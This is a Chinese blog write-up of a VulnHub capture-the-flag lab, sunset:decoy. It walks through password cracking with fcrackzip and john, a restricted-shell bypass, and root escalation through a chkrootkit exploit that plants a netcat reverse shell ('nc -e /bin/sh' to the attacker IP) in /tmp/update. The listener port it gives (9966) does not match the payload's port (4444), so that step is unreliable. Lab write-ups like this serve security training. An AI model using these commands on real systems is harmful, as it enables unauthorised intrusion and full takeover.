vulnhub靶机sunset:decoy渗透笔记

1.环境搭建

靶机环境搭建
攻击渗透机: kali IP地址:192.168.33.139
靶机:sunset:decoy IP地址未知
靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/

2.vulnhub靶机sunset:decoy渗透笔记
扫描得到目标靶机IP地址为:192.168.33.147 若扫描不到目标靶机IP地址,可查阅我写的这篇文章进行解决https://blog.csdn.net/liver100day/article/details/119109320

2.2 端口扫描

知道了目标靶机的IP地址,接下来就扫描目标靶机,获取目标靶机开放的端口和服务

nmap -T4 -sV -A -O -p- 192.168.33.147 

vulnhub靶机sunset:decoy渗透笔记
发现目标靶机开放了22端口(ssh服务),80端口(http服务)

2.3 访问80端口(http服务)

访问目标网页,发现了一个压缩包文件
vulnhub靶机sunset:decoy渗透笔记
使用命令将压缩包文件下载到本地

wget http://192.168.33.147/save.zip 
vulnhub靶机sunset:decoy渗透笔记
成功保存到了本地(文件保存路径若不指定的话,默认下载到你的当前路径下)
vulnhub靶机sunset:decoy渗透笔记
果然需要密码才行
vulnhub靶机sunset:decoy渗透笔记

3. vulnhub靶机sunset:decoy渗透笔记
进行爆破密码

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip 

vulnhub靶机sunset:decoy渗透笔记
爆破成功,密码为:manuel
解压压缩包文件,并对压缩包内的文件进行查看

unzip save.zip 

vulnhub靶机sunset:decoy渗透笔记
vulnhub靶机sunset:decoy渗透笔记
最后在shadow文件里面,发现了296640a3b825115a47b68fc44501c828用户和它已经加密过的密码

3.2 爆破用户密码

使用john命令爆破一下密码

john --wordlist=/usr/share/wordlists/rockyou.txt shadow # 这条命令需要你进行 etc/ 目录之后执行,否则需给出shadow文件的详细路径 
vulnhub靶机sunset:decoy渗透笔记
这里爆破相当花时间,成功爆破,密码为:server
vulnhub靶机sunset:decoy渗透笔记

3.3 ssh登录

知道了用户名和密码,第一时间怀疑ssh,目标开放了22端口(ssh服务),开始登录

ssh 296640a3b825115a47b68fc44501c828@192.168.33.147 

vulnhub靶机sunset:decoy渗透笔记
成功ssh登录进去,但是却发现很多命令都执行不了,是个受限制的shell
vulnhub靶机sunset:decoy渗透笔记
ssh连接时添加-t "bash --noprofile"即可bybass,然后再添加环境变量即可,拿到第一个flag

ssh 296640a3b825115a47b68fc44501c828@192.168.33.147 -t "bash --noprofile" echo $PATH PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 
vulnhub靶机sunset:decoy渗透笔记
这样我们就可以正常执行命令了
vulnhub靶机sunset:decoy渗透笔记
但是却无法以root权限执行任何操作
vulnhub靶机sunset:decoy渗透笔记
user.txt文件中找到了第一个flag
vulnhub靶机sunset:decoy渗透笔记

4.提权

发现SV-502目录,在里面发现一个logs文件
vulnhub靶机sunset:decoy渗透笔记
vulnhub靶机sunset:decoy渗透笔记
logs文件中,发现了文件log.txt
vulnhub靶机sunset:decoy渗透笔记
查看之后,发现是一个pspy64运行日志,有一条有用的信息
vulnhub靶机sunset:decoy渗透笔记
在kali中查找有无这个服务的漏洞

searchsploit chkrootkit 

vulnhub靶机sunset:decoy渗透笔记
成功找到版本对应的漏洞利用文件,查看这个漏洞利用文件了解详细信息

cat /usr/share/exploitdb/exploits/linux/local/33899.txt 

vulnhub靶机sunset:decoy渗透笔记
vulnhub靶机sunset:decoy渗透笔记
漏洞利用文件说的相当详细了直接照着开始执行

写入反弹shell一句话
echo "/usr/bin/nc -e /bin/sh 192.168.33.139 4444" > /tmp/update 
vulnhub靶机sunset:decoy渗透笔记
给/tmp/update执行权限
chmod 777 /tmp/update 
vulnhub靶机sunset:decoy渗透笔记
kali开启端口监听
nc -lvp 9966 
vulnhub靶机sunset:decoy渗透笔记
执行文件,获取root权限

进入**/home/296640a3b825115a47b68fc44501c828/目录,输入./honeypot.decoy**
vulnhub靶机sunset:decoy渗透笔记
等待一分钟过后,就有所显示了
vulnhub靶机sunset:decoy渗透笔记

使用python切换至交互式shell
python -c 'import pty;pty.spawn("/bin/bash")' 

vulnhub靶机sunset:decoy渗透笔记
成功拿取到flag,拿到了root权限,那目标靶机就已经完全被你攻破了

5.总结

1.反弹shell一句话木马 还有不熟练的地方
2.密码破解工具使用较少
3.基础命令总是会忘,还要多加练习

最近一直在学习,但是学习的东西很多很杂,于是便把自己的学习成果记录下来,便利自己,帮助他人。希望本篇文章能对你有所帮助,有错误的地方,欢迎指出!!!喜欢的话,不要忘记点赞哦!!!

版权声明:玥玥 发表于 2021-08-04 21:56:38。
转载请注明:vulnhub靶机sunset:decoy渗透笔记 | 女黑客导航